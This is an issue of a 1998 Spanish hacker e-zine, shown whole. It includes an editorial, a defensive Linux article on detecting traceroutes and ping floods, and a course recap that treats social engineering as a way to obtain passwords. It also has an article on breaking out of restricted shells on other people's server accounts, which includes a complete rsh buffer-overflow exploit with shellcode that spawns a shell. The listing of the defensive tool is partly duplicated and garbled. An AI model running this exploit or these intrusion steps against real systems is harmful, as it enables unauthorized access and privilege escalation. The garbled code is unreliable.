Copy Link
Add to Bookmark
Report

JJF Hackers Team Journal 5

eZine's profile picture
Published in 
JJF Hackers Team Journal
 · 2 days ago

                        …----------------------------ª 
| ⁄------ø |
| |€€€€€€| |
| ⁄------¥€€⁄---Ÿ |
| ⁄------¥€€€€€€|€€¿-ø |
| |€€€€€€√-ø€€⁄-¥€€€€| |
| ¿-ø€€⁄-¡ø|€€|J|€€⁄-Ÿ |
| ⁄--ø|€€|€€¿Ÿ€€|J|€€| |
| |€€¿Ÿ€€|€€€€€€|F√--Ÿ |
| |€€€€€€√------¡-Ÿ |
| ¿------Ÿ |
| H A C K E R S T E A M |
| J O U R N A L |
Ã----------------------------π
| VOL. #1, N°5, 1998. |
»----------------------------º


"LA PACIENCIA ES LA LLAVE DEL CONOCIMIENTO"


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
de la informacion aqui expuesta y tampoco tiene que estar
de acuerdo con lo que sus colaboradores opinen.
Tampoco esperamos que la gente use la informacion aqui expuesta
para hacer daño ya que tan solo es con fines didacticos.

Recomendado el uso del editor del MS-DOS.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#CURRENT MEMBERS :

- CONDE VAMPIRO - CODER H/P/V EDITOR
- MAC CRACK BISHOP - CODER C/P WEBMASTER

#WEB OFICIAL :

- http://www.angelfire.com/mi/JJFHackers
- http://jjfhackers.home.ml.org

#E-MAIL OFICIAL :

- jjf_team@usa.net

#LLAVE PGP OFICIAL :

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
=Wu00
-----END PGP PUBLIC KEY BLOCK-----

#DISTRIBUIDORES OFICIALES DEL E-ZINE :

- http://wakanda.islatortuga.com
- http://underhack.islatortuga.com
- http://teleline.es/persona/dep_blue
- http://members.xoom.com/baron_rojo/
- http://oioio.dyn.ml.org

#MIEMBRO OFICIAL (web ring) DE :

- Black Angels
- Spanish Underground Web Ring

#COLABORADORES CON ESTE NUMERO :

- CubikIce
- Nobody
- Estado Porcino (WKT)

#SALUDOS :

- Metalslug (Wakanda)
- Schoddy Guy (Underhack)
- Cheroky
- Silicon Dragon
- Paseante (SET)
- Dr Slump (oioio)

<---------------------------------------------------------------------------->
<---------------------------------------------------------------------------->
<---------------------------------------------------------------------------->

- INDICE.

TITULO AUTOR
------------\_______________________________/------------

* EDITORIAL ................................ J.J.F. / HACKERS TEAM
* HACK RSH (RESTRICTED SHELL) .............. NOBODY.
* HERRAMIENTAS PARA USUARIOS DE LINUX
(PARANOICOS?) ............................ CUBIKICE.
* CURSO DE HACK V .......................... CONDE VAMPIRO.
* COMO CRACKEAR NORTON CRASHGUARD
DELUXE 3.0 ............................... ESTADO PORCINO.
* UN POCO DE CULTURA: LIBROS ............... MAC CRACK
* EL LECTOR OPINA .......................... VARIOS.
* NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

-------------
| EDITORIAL |
-------------

Como siempre volvemos a la carga con un nuevo numero de vuestro ezine
favorito que siempre trae suculentos articulos. Pero por lo visto en los
mail's de nuestros lectores, se puede apreciar que muchos nos deciis que
nos pasamos con las materias aqui tratadas, otros que quereis informacion
underground con el unico fin de colaros en computadoras ajenas, esto
señores mios!, es totalmente irracional. La filosofia de este ezine no se
asemeja a esto ni por casualidad. Nosotros desde aqui lo unico que
pretendemos es informar a la gente pero nunca con fines delictivos ni nada
parecido, incluso estariamos encantados que los Administradores, expertos
en seguridad, las autoridades, nos escriban articulos o sus opiniones, ya
que este ezine esta pensado para todo el mundo.

AVISAMOS, que la llave PGP que durante algunas semanas ha estado en
la web disponible, ya NO es nuestra llave oficial, por eso os avisamos
que nuestra llave oficial es esta que trae el ezine :) y tb la que esta
ahora en el web.

Por fin, como muchos lectores nos habian solicitado hemos puesto
tanto en el web como en el ezine, nuestra llave publica, con el fin de
aquellos que nos quieran decir algo mas confidencialmente lo puedan hacer
sin ningun problema, como siempre mejoramos los servicios ;-) Ademas en
este numero a los distribuidores oficiales se nos unen los de Oioio, ya
conocidos en nuestro ezine :), pero este web solo esta disponible en
ciertas ocasiones, que conste!!

Con este numero termina nuestro primer volumen, el cual pensamos,
que esta muy bien para la poca ayuda que recibimos por el momento, con
permiso de un conocido politico que en un meeting dijo 'Menos aplausos y
mas votos', yo digo 'Menos felicitaciones y mas articulos', esto solo
intenta ser una reflexion entre los lectores, ya que este ezine lo hacemos
todos no solo nosotros, siempre hay trabajo para todos.

Deciros que ultimamente el USA.NET, el servidor donde nos enviais el
correo no ha funcionado muy bien que digamos, por eso seguramente vuestros
mail's no han llegado, por lo que simplemente nos vuelves a escribir y
listos. Tambien deciros que procuramos que el web este siempre actualizado
pero teneis que comprender que siempre se nos queda algun link antiquado,
ya que el web es muy dinamico y hacemos lo que podemos, okis ?

Bueno, chicos, ahora que ya estamos casi en verano, es hora de
quitar el polvo a los ordenadores y hacer algo util en nuestras vidas, como
por ejemplo investigar aquella cosa que te tiene tan intrigado y despues
escribir un articulo sobre ello. Ahora ya no teneis excusa para trabajar
un poco ;-)

Que empieze lo bueno de una vez, pero no antes sin decirte que
esperamos vuestros mail's con vuestras criticas, sugerencias, comentarios o
cualquier cosa que nos quieras decir, y por supuesto vuestros actos de hack
y tambien los programas que hayas creado para distribuirlos ;-), pues dicho
todo lo que tenia que decir, escribe a:

jjf_team@usa.net

NOTA DEL WEBMASTER: Como ya habeis leido un poco mas arriba de esta
editorial, los web los intento actualizar lo mas que puedo, ya se que hay
de vez en cuando algunos links que no funcionan y que antes lo hacian,
estoy en ello. Muchas veces esto pasa porque los servers a los que les he
puesto el link se han caido, o estan de remodelacion. Una cosa que si
quiero dejar clara, es que las web se actualizan periodicamente y los links
se comprueban casi diariamente con el fin de que sigan funcionando perfec-
tamente y a gusto de todos. Otra cosa, en vez de mandarme un mail diciendo
que no funcionan los links (algunos) mejor, decirme cuales NO funcionan e
intentare arreglarlos lo antes posible. Gracias. ;-)


- J.J.F. / HACKERS TEAM -

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
15-05-1998.
????????

()()()()()()()()()()()()()()()()()
() HACK RSH (RESTRICTED SHELL) ()
()------------------------------()
() by Nobody ()
()()()()()()()()()()()()()()()()()

Muchas veces cuando entramos en un shell ajeno, o sea en una cuenta
de un servidor, nos encontramos con el famoso RSH 'restricted shell', que
es un shell restringido, el cual es establecido por el administrador del
sistema, para anular la ejecucion de comandos que pueden comprometer la
seguridad del sistema, o incluso anulan el comando 'cd' para que no
podemos salir de nuestro directorio de trabajo.

Basicamente, lo que haremos aqui es explicar diferentes tecnicas,
para poder saltarnos el rsh :), que conste que puede que estos metodos no
funcionen, por lo que nos tendremos que espabilar y buscar nuevos metodos,
solo teneis que poner a trabajar esa 'materia gris' que teneis por cabeza.

Ahora lo mejor sera describir las restricciones que aplica el RSH,
y como funciona. Estas restricciones son :

- Los usuarios no pueden moverse de su directorio propio, ya que la orden
'cd' esta descapacitada.

- Los usuarios no puden cambiar el valor de la variable PATH, de modo que
solo pueden ejecutar ordenes en el PATH que les proporciona el
administrador del sistema.

- Los usuarios no pueden cambiar el valor de la variable SHELL.

- Los usuarios no pueden ejecutar ordenes en directorios a los que
aparezcan en su PATH, ya que no pueden utilizar un nombre de orden que
contegan una barra diagonal '/'.

- Los usuarios no pueden redirigir la salida usando '>' o '>>'.

- Los usuarios no pueden utilizar ordenes exec.

Como podemos ver el RSH, nos deja bastante limitados en el manejo del
sistema. Estas restricciones se aplican cuando se ha ejecutado el .profile
del usuario. El administrador debe preparar el fichero .profile, cambiando
el propietario del fichero a root y ademas debe cambiar los permisos en el
fichero para que nadie escriba en el mismo. El administrador define el
PATH del usuario en el .profile de modo que el usuario solo pueda ejecutar
comandos en su directorio especifico, generalmente se suele denominar
/usr/rbin.

En realidad el RSH suele ser el shell SH pero invocado mediante el
parametro '-r'. La seguridad del RSH esta muy limitada ya que un hacker
puede quebrarlo y obtener un shell sin rectricciones, pero se suele usar
bastante ya que nos librara de muchos que juegan a hackers ;-)

Bueno, ya basta de teoria y empezemos con el juego. Como sabemos en
cada directorio de los usuarios hay unos determinados ficheros, que sirven
para configuraciones y a que podemos acceder, etc. Por ejemplo para ver
estos ficheros que son ocultos ejecutamos en el prompt :

$ ls -al
total 14
drwxr-xr-x 2 500 nobo 1024 May 7 20:18 .
drwxr-xr-x 6 root root 1024 May 7 16:05 ..
-rw-r--r-- 1 500 nobo 3768 Nov 7 1997 .Xdefaults
-rw-r--r-T 1 root root 143 May 7 14:52 .bash_history
-rw-r--r-- 1 500 nobo 24 Jul 14 1994 .bash_logout
-rw-r--r-- 1 500 nobo 220 Aug 23 1995 .bash_profile
-rw-r--r-- 1 500 nobo 124 Aug 23 1995 .bashrc
-rw-rw-r-- 1 500 nobo 3336 Oct 24 1997 .screenrc
$

Bueno, aqui tenemos un ejemplo de los ficheros ocultos que suelen
tener los usuarios en sus directorios, los ficheros que nos interesan
para este caso seran el .profile, aqui como .bash_profile y el .login
que aqui no esta presente, que suele estar en algunos sistemas.

Que podamos saltarnos el RSH se debe al descuido de los
administradores, ya que esta considerado peligroso dejar el .profile en el
directorio del usuario, debido a que muchas veces podemos sustituir el
.profile por uno que creemos y subirlo usando el FTP a la cuenta. Lo que
tenemos que hacer es crear un .profile en nuestra maquina, despues lo
subimos por FTP a la cuenta que nos interesa y por ultimo via Telnet
conectamos a la cuenta y ya estaremos usando el .profile que hayamos
insertado :). Esto se debe a que aunque el .profile sea de propiedad root
se encuentra en el directorio del usuario, por esta razon el usuario o en
nuestro caso, nosotros, podemos escribir en el .profile. Para ver que shell
tenemos, basta que mirremos el etc/pa°wd que es un fichero de lectura
publica, aunque este en shadow podemos ver la ubicacion de los directorios
de los usuarios y los shell's asignados, esto lo haremos de la siguiente
manera:

$ vi /etc/pa°wd

Facil!! ;-) Pues ya a estas alturas ya debemos haver anulado el RSH,
pero para aquellos que tengan un administrador mas avispado, que utilizen
el siguiente programa, el cual desborda la memoria.

------------ Codigo Fuente ---------------------------------------------------

/*
SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997
Created: 8/15/97

Give thanks to Solar Designer for his su overflow, this is based
on that peice of work.

This is for educational purposes only, in no way am I responsible
for what you do with this. This should be used by sys admins, or
people who have permi°ion of the admin to run it to see if this
hole can exist on their system. If you use it for the wrong reasons
then I say *tisk* on you. I will not be held responsible for your
actions.

This could be done with a generic overflow program, but just
running this is easier.

USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
ME°AGE ANYBODY ON IRC ABOUT THIS.

*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3072;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
system("clear");
printf("______________________________________________________________\n");
printf("| RSH Overflow -- (c) shit-head 1997\n");
printf("| Give props to Solar Designer for his su overflow, this is based
on that.\n"
);
printf("|\n");
printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n");
printf("|\n");
printf("| *NOTE* I'm not responsible if you abuse this. Run only w/
premi°ion\n"
);
printf("| Sending Overflow.... Done.\n");
printf("--------------------------------------------------------------\n");
execl("/usr/bin/rsh", "/usr/bin/rsh", NULL);
}

------------ FIN -------------------------------------------------------------

Bueno, gente esto es todo por hoy y espero que os haya gustado el
tema. Logicamente el RSH tiene mas truco pero no tiene gracia si os lo
digo todo ;-)

Y desde aqui saludar a toda la peña de #seguridad_informatica!!!!!

Grupos como - J.J.F. / HACKERS TEAM - , CYBERHACK, WAKANDA, UNDERHACK,
@pOkalypSYS, Oioio y todos los demas !!

Y por supuesto : Bisho, Folixia, Fragel, Ipgh0st, Metalslug, Dillet,
Riddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, Schoddy Guy, Xus,
Enif, Bit-Quake, L.A., Nadia, Amanda, Case_zero, DrSlump, Prova, Marsuff,
Meroka, Eli, Minister, ElCoronel, Daek, Cosmic, Net Bull, Profesor Falken,
Icehouse y todos los que me dejo :)

NOBODY (c) 1998.

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

No creo que haya que decir que todo esto es por mero interes educativo!
o si? :)

/////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[ Phrack Magazine Volume 7, I°ue 5, Article 03 of 17]


Herramientas para usuarios de Linux (paranoicos?)
-------------------------------------------------

por whynot AKA baldor

!!Se necesitan conocimientos basicos de TCP/IP para entender este articulo≠≠

Recientemente no solo el numero de ataques a servidores grandes o
comerciales y maquinas con conexiones rapidas ha crecido, tambien muchos
usuarios con conexion via telefonica han sido atacados o espiados. Un buen
ejemplo es el programa winnuke.c que fue enviado a BugTraq y ha sido usado
con exceso.

Aqui, de lo que se trata no es de que sean lanzados hacia grandes
servidores, sino de que pueden llegar a ser agobiantes si algun idiota
intenta hackearte, para ralentizar tu conexion o tirar tu maquina.

Muchas distribuciones de Linux han reaccionado ante tal desarrollo y
han hecho que sus daemons de telnet/ftp/otros logueen cualquier acceso. Por
la misma razon puedes poner furiosas medidas de seguridad en tu
/etc/hosts..deny. Pero en mi opinion hay un par de cosas que se olvidan de
las que yo quisiera hablar aqui.

1. Detectando traceroutes.

Traceroute es un comando realmente poderoso que es normalmente usado
para detectar donde y a que red esta conectado el ordenador que esta siendo
trazado. Por una serie de razones simplemente *no* puedes evitar que otra
persona te tracee, por eso lo mejor que puedes hacer es detectar *si*
alguien te esta traceando o encontrar *quien* te esta traceando y
confundirle un poco.

1.1 Como trabaja traceroute?

Basicamente traceroute envia unos paquetes IP/UDP de prueba al host
especificado. Para saber como es rutado el paquete (por que hosts esta
pasando) traceroute usa el campo TTL (Time To Live) de la cabecera IP.
El campo TTL especifica el limite superior de routers por los cuales pasa el
paquete hasta que se pierde. Cada router decrementa el valor de este campo
cuando llega el paquete en cuestion, hasta que llega a 0. Si esto ocurre
el router envia el mensaje ICMP TIME_EXCEED al host que env°a el paquete.

Por eso la estrategia que traceroute usa para trazar la ruta de un
paquete es enviar paquetes al host objetivo poniendole un valor que se
incrementa (empezando con 1) en el campo TTL. Si un host envia el mensaje
ICMP TIME_EXCEED traceroute muestra su direccion y el tiempo que ha pasado
desde el envio del paquete de prueba IP/UDP hasta la recepci¢n del ICMP
TIME_EXCEED. Tras eso prepara un nuevo paquete de prueba con un TTL una
unidad mayor que el paquete anterior.

Traceroute sigue haciendo esto hasta que recibe un paquete ICMP
PORT_UNREACHABLE desde el ordenador objetivo, o hasta que llega al numero
maximo de hops (saltos) que le hayamos indicado (por defecto 30).

Para comprender todo esto deberiamos echarle un vistazo a la parte
UDP del paquete que hemos hablado arriba. Para detectar que algo ha llegado
al host objetivo y no enviar mas paquetes traceroute usa el protocolo UDP.
La parte UDP del paquete de prueba esta dirigida a un puerto que nunca, o
muy raramente se usa (en los Unix mas modernos es 33434 mas el TTL incluido
en el paquete IP). Como (normalmente) nada esta escuchando en el puerto
33434 (o uno superior) el host objetivo envia una señal de ICMP
PORT_UNREACHABLE que le indica a traceroute que ha encontrado al host
objetivo y debe parar de enviar paquetes.

Teniendo en cuenta que la mecanica de traceroute es un poco compleja
aqui tenemos un ejemplo un poco simplificado. Digamos que tu eres el host
'source' y estas trazando tu ruta hacia el host 'target'

source:/root # traceroute target
traceroute to target (134.2.110.94), 30 hops max, 40 byte packets

Ahora 'source' env°a un paquete de prueba al host 'target' (puerto
33434) con un TTL de 1. El paquete pasa entonces por 'host_entremedio' y el
router decrementa el TTL del paquete, descubre que el paquete ha "expirado"
(TTL=0) y envia de vuelta un ICMP TIME_EXCEED a 'source'. Ahora traceroute
usa la informacion incluida en este paquete para mostrar los datos del
primer host por donde estan pasando los paquetes:

1 host_entremedio (142.45.23.1) 2.456 ms

'source' envia otro paquete de prueba, esta vez el TTL es 2 y el
puerto es 33434+1 = 33435. Recibe otro paquete de vuelta ICMP TIME_EXCEED
desde 'otro_host':

2 otro_host (142.45.10.1) 3.983 ms

La tercera prueba tiene el TTL puesto a 3 y es dirigida al puerto
33436. Es ahora cuendo Traceroute recibe un ICMP PORT_UNREACHABLE desde
'target':

3 target (142.45.10.13) 4.032 ms

Ahi esta ! Traceroute ha terminado su trabajo y se finaliza.

source:/root #

Hay que decir que, por defecto, traceroute envia tres paquetes
conteniendo el mismo TTL (cada paquete a un numero de puerto incrementado)
para determinar el tiempo de respuesta de un host con mas exactitud. En
realidad, traceroute nos muestra algo como esto:

traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets
1 localhost (127.0.0.1) 1.983 ms 1.304 ms 0.934 ms

1.2 El funcionamiento del detector de traceroute.

Sabiendo como trabaja traceroute es muy facil detectarlo. Simplemente
pon tus sockets a escuchar en el puerto 33434 y superiores y reacciona
si recibes algun paquete. Puedes intentar adivinar con cuantos hops te
estan traceando restando 33434 al puerto donde has recibido el paquete y
dividiendo el resultado por 3.

Escuchar en el puerto por el que traceroute envia el paquete de prueba
tiene un bonito efecto: no enviar de vuelta un paquete ICMP TIME_EXCEED ni
una señal de ICMP PORT_UNREACHABLE. Obtendr un timeout por respuesta y
pondra un * en la lista de hosts porque con un timeout traceroute *no*
reconocer que ha pasado por su objetivo y continuar enviando paquetes de
prueba hasta que el numero maximo de hops sea alcanzado.

Con el pequeño programa detecttr corriendo (y escuchando en los
puertos 33434 - 33434*30*3) un traceroute a nuestro host apareceria asi:

schnecke:/root # traceroute localhost
traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets
1 * * *
2 * * *
.
.
.
30 * * *

1.3 Problemas detectando traceroutes.

El unico problema con la deteccion de traceroutes es que alguien
puede especificar un numero de puerto distinto del que hay por defecto o
usar otra tecnica. Nunca he visto a nadie hacer esto, asi que si el idiota
de turno (o un wannabe cualquiera) te esta trazando tus posibilidades de
detectarlo son bastante altas.

Si eres *realmente* paranoico con los traceroutes no deberias usar
los puertos para detectar un traceo pero puedes editar el fichero que
maneja los paquetes UDP. El fichero es: /usr/src/linux/net/ipv4/udp.c

(NOTA: Este fichero es parte del kernel. Recompila el kernel para que
los cambios tengan efecto)

Inserta la linea:

printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n",
in_ntoa(daddr));

Tras la linea 833:

ICMP_send(ski,ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de);

Esto hara que el sistema loguee *todas* las entradas a puertos que
no esten escuchando algo con el protocolo UDP. Hay que decir que el bonito
efecto descrito en el capitulo 1.2 no ocurriria (lo cual tambien podria ser
una ventaja).

BTW: Por favor, ten cuidado cuando edites el kernel - realmente lo
necesitas :)

1.4 Un ejemplo de implementacion.

detecttr.c -> Mira al final de este fichero

2.Detectando pings.

Hubo un monton de discusion en los ultimos meses sobre ping porque ha
sido usado con bastante frecuencia para transmitir gruesos paquetes a otros
hosts que acabaron en crashes. A pesar de que este bug ha sido corregido en
muchos hosts, el comando ping sigue siendo muy popular para ralentizar el
modem de quienes estan en la Red, la conexion se les viene abajo debido a
un GRAN lag.

*No* puedes evitar que alguien te haga un ping (a no ser que tu ISP
bloquee todos los paquetes ICMP_ECHO hacia tu ordenador) y tampoco que ping
este aumentando el trafico en tu modem. Pero puedes detectar *quien* te ha
hecho un ping, determinar el tamaño del paquete ping y decidirte a no
contestarle (esto *puede* reducir en 2 veces el ancho de banda de tu modem).

2.1 Como trabaja ping y como la gente ralentiza otras conexiones usando
ping?

Resumiendo, ping envia un paquete conteniendo un ICMP_ECHO y algunos
datos mas al host objetivo el cual contestar con un paquete ICMP_ECHOREPLY
que contiene, ademas, los datos enviados (solo se modifican unos pocos
campos).

Normalmente ping esperar un 1 segundo despues de enviar el siguiente
ICMP_ECHO. En muchas implementaciones de ping se puede pasar por alto este
segundo y hacer un 'floodping' que *no* esperar y enviar los paquetes tan
rapido como sea posible. Si eliges un tamaño grande de paquete y tu
conexion es rapida (T1 o Ethernet) esto causar un monton de trafico en el
modem de tu victima y acabara ralentiza ndolo hasta desconectarlo.

2.2 Como puedo detectar un ping y como puedo evitar que me flodeen?

Como un ping no es mas que un ICMP_ECHO con algunos datos añadidos
simplemente puedes interceptarlo, extraer la direccion del que te lo envia
y el tamaño del paquete y decidir si quieres responderle o no. Si el ping
no es un flood-ping puedes reducir la cantidad de datos que transfieres
desde tu modem simplemente no respondiendole. Pero si alguien te esta
haciendo un floodping no te ayudar mucho el no responderle --> los paquetes
ping probablemente estan causandote demasiado trafico y ralentizando tu
conexion (mientras el host desde donde vienen los floodpings tenga una
conexion lenta). Por lo menos siempre puedes darle una oportunidad...

2.3 Ejemplo de implementacion

El manejo del ICMP_ECHO le corresponde al kernel. Edita el fichero
/usr/src/linux/net/ipv4/icmp.c y busca la seccion 'Handle ICMP_ECHO'.
Estas 16 lineas de codigo son todo lo que necesitas modificar para
defenderte contra/detectar los ping-floods.

Si sabes un poco de C podras ver que hay un define
"CONFIG_IP_IGNORE_ECHO_REQUESTS" que puedes usar para que el el kernel
ignore todos ICMP ECHO_REQUESTs entrantes. Pero queremos ser mas selectivos.
Queremos hacer un log de todos los pings que envien a nuestra maquina.. Esto
lo haremos insertando la linea:

printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr),
icmp_param.data_len);

tras el #endif.

Es facil cambiar la seccion "Handle ICMP_ECHO" asi tu ordenador
solo responder a los ICMP ECHO_REQUESTs que no sean muy voluminosos e
ignorar los pings con paquetes de gran tamaño.

icmp.patch
static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct
device
*dev, __u32 saddr, __u32 daddr, int len)
{
#ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS
struct icmp_bxm icmp_param;
if (len <= 1000) { /* solo contestamos a los ping que lleven menos de 1k de
datos */

icmp_param.icmph=*icmph;
icmp_param.icmph.type=ICMP_ECHOREPLY;
icmp_param.data_ptr=(icmph+1);
icmp_param.data_len=len;
if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0)
icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos);
printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",
in_ntoa(saddr),icmp_param.data_len);
}
else
printk(KERN_INFO "ICMP: po°ible FLOOD DETECTED by %s, packetsize = %d \n",
in_ntoa(saddr),len );
#endif
kfree_skb(skb, FREE_READ);
}

------------ Codigo Fuente ---------------------------------------------------

detecttr.c
/*
* detecttr.c - by whynot AKA baldor (whynot@cyberjunkie.com)
* creado el: 08.05.97
* ultima modificacion: 11.07.97
* Plataformas: Linux, FreeBSD, podria funcionar con otros sistemas POSIX
* tambien.
*
* Compilacion:
* usa "gcc -o detecttr detecttr.c" para GNU C y
* "cc -o detecttr detecttr.c" para otros compiladores...
*
* Uso:
* Ejecuta este programa al arrancar la maquina permanecer en background
* hasta que alguien te haga un traceroute. Solo hace un *miserable* uso de
* tu RAM y cerca de un 0% de uso de tu CPU :)
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/signal.h>
#include <sys/syslog.h> /* comenta esta linea si no tienes syslog.h */
#include <netdb.h>


#define MAXBUFLEN 200
#define MYPORT 33435
#define NUMPORTS 30*3

int sockfd[NUMPORTS];


void shutitdown()
{

int w;
char buf[50];
for (w=0; w<NUMPORTS; w++)
close(sockfd);
sprintf (buf,"DetectTraceroute terminado\n");
syslog(LOG_NOTICE , buf);

exit(0);
}

char *getname (struct in_addr addr)
{
struct hostent *h;
int w;
char foo[4]; /* los 4 numeros se usan como valores ASCII en un char */
int tmpint[4]; /* se usa para convertir un string en 4 numeros */
char tmpbuf[20];

sprintf(tmpbuf, "%s", inet_ntoa(addr));

if ( °canf(tmpbuf,"%d.%d.%d.%d", &tmpint[0], &tmpint[1], &tmpint[2],
&tmpint[3]) != 4) {
printf ("Error detectando nombre de host !\n");
exit(1);
}

for(w=0; w<4; w++) foo[w]=tmpint[w];

if ( (h=gethostbyaddr(foo, 4, AF_INET)) == NULL) {
herror("gethostbyaddr");
exit(1);
}
return h->h_name;
}

main(int argc, char *argv[])
{
int hops;
struct sockaddr_in my_addr;
struct sockaddr_in remote_addr;
int addr_len, numbytes;
char buf[MAXBUFLEN];
int w;
fd_set readfds;


if( fork() !=0 ) return(0); /* Si no queremos usar el &... */


signal(SIGHUP, SIG_IGN); /* ignorar SIGHUP */

signal(SIGTERM, shutitdown); /* shutdown limpio */

for(w=0; w<NUMPORTS; w++) {

if ( (sockfd[w] = socket( AF_INET, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons (MYPORT+w);
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);

bzero(& (my_addr.sin_zero), 8);

if ( bind (sockfd[w], (struct sockaddr *)&my_addr, sizeof (struct sockaddr) )
== -1) {
perror("bind");
exit(1);
}
}

FD_ZERO(&readfds);
for(w=0; w<NUMPORTS; w++)
FD_SET(sockfd[w], &readfds);


sprintf (buf,"DetectTraceroute iniciado con exito\n");
syslog(LOG_NOTICE , buf);

while(1) {
select(sockfd[NUMPORTS-1]+1, &readfds, NULL, NULL, NULL);

for (w=0; w < NUMPORTS; w++) {
if (FD_I°ET(sockfd[w], &readfds))
hops = w;
}

addr_len = sizeof(struct sockaddr);

if ((numbytes=recvfrom(sockfd[hops], buf, MAXBUFLEN, 0, (struct sockaddr
*)&remote_addr, &addr_len)) == -1) {
perror("recvfrom");
exit(1);
}

/* we use buf for misc stuff O:-) */
sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d",
inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1);
syslog(LOG_NOTICE , buf);
FD_ZERO(&readfds);
for(w=0; w<NUMPORTS; w++)
FD_SET(sockfd[w], &readfds);
}
}
}

/* we use buf for misc stuff O:-) */
sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d",
inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1);
syslog(LOG_NOTICE , buf);
FD_ZERO(&readfds);
for(w=3D0; w<NUMPORTS; w++)
FD_SET(sockfd[w], &readfds);
}
}

------------ FIN -------------------------------------------------------------

Traducido por CubikIce -- cubikice@iname.com

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

- CURSO DE HACK -
CHAPTER V

Bueno, como ya se dijo en la Editorial este es el fin del primer
volumen, por lo que creo que sera aconsejable en este numero, dar un
repaso de las lecciones aprendidas. Ahora ya deberiamos tener una nocion
basica de Hacking, pasando por la ingenieria social hasta un analisis de
un server, pero para los que no les quedo claro, con lo expuesto aqui ya
saldran de dudas y para aquellos que ya lo hayan aprendido pues un
repaso no les vendra nada mal.

Como vimos en el primer numero fue la ingenieria social, esto no
creo que sea muy dificil de entender, basicamente consiste en hacernos
pasar por otra persona con el fin de sacarle su login y pa°word o algun
tipo de informacion confidencial. Con el tiempo se ira cogiendo practica
con esta tecnica y ademas seguir los pasos explicados en el numero 1° del
ezine, ya que tenemos que tener mucho cuidado de lo que decimos y de quien
nos hacemos pasar, ya que nos podriamos delatar.

El capitulo II esta enfocado a tecnicas hacker utilizando el
